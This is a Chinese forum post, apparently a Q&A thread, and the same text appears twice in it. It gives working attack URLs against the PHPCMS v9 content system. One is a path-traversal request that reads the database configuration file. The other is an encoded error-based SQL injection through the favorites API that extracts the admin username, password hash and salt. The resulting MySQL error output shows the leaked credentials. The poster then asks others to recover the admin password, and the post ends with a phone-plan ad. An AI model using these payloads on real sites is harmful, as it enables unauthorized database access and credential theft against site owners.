http://www.xxxxxxxx/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
-------------
可以得到数据库链接信息****************************
注册会员后,访问
http://www.xxxxxxx/api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271
---------------------
可以得到管理帐号信息
MySQL Query : INSERT INTO `***`.`v9_favorite`(`title`,`url`,`adddate`,`userid`) VALUES ('' and (select 1 from(select count(*),concat((select (select (select concat(0x23,cast(concat(username,0x3a,password,0x3a,encrypt) as char),0x23) from v9_admin LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1','v9','1368087280','72')
MySQL Error : Duplicate entry '#admin:7aafba99a5edf41f2f79eded4656e98e:wudSKh#1' for key 1
MySQL Errno : 1062
Message : Duplicate entry '#admin:7aafba99a5edf41f2f79eded4656e98e:wudSKh#1' for key 1 -----------------
谁能知道这个用户的管理密码是多少
-------------
可以得到数据库链接信息****************************
注册会员后,访问
http://www.xxxxxxx/api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271
---------------------
可以得到管理帐号信息
MySQL Query : INSERT INTO `***`.`v9_favorite`(`title`,`url`,`adddate`,`userid`) VALUES ('' and (select 1 from(select count(*),concat((select (select (select concat(0x23,cast(concat(username,0x3a,password,0x3a,encrypt) as char),0x23) from v9_admin LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1','v9','1368087280','72')
MySQL Error : Duplicate entry '#admin:7aafba99a5edf41f2f79eded4656e98e:wudSKh#1' for key 1
MySQL Errno : 1062
Message : Duplicate entry '#admin:7aafba99a5edf41f2f79eded4656e98e:wudSKh#1' for key 1 -----------------
谁能知道这个用户的管理密码是多少
解决方案 »
免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货